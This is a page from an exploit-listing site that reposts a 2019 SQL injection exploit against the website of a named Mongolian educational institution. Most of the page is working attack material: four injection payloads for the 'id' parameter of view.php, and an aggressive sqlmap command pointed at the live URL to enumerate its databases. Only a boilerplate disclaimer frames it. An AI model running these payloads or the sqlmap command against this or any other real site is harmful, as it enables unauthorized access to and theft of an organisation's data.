Advertisement






Cmuc Education SQL INJECTION VULNERABILITY

CVE Category Price Severity
Not specified CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2019-09-16
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.02443 0.58969

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019090117

Below is a copy:

Cmuc Education SQL INJECTION VULNERABILITY
##############################################################################
# Exploit Title : Cmuc Edication SQL INJECTION Vulnerability
# Author  : AtakBey,Secret Team
# Date : 15/09/2019
# Vendor Homepage : cmuc.edu.mn
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
##############################################################################
# Exploit :
/view.php?id=[SQL Injection]

# Payload :
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=25 AND 8940=8940

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=25 AND (SELECT 7025 FROM(SELECT COUNT(*),CONCAT(0x7171786271,(SELECT (ELT(7025=7025,1))),0x7170706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=25 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: id=25 UNION ALL SELECT CONCAT(0x7171786271,0x43785a536d4b4f5a694642616c6450455269546f547a794d536d5376626146515a6e58646c554e6f,0x7170706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- EAKG

# SQLMAP Config
sqlmap.py -u "http://cmuc.edu.mn/view.php?id=25" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

##############################################################################
# Thanks : Atakbey,Secretteam.biz

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum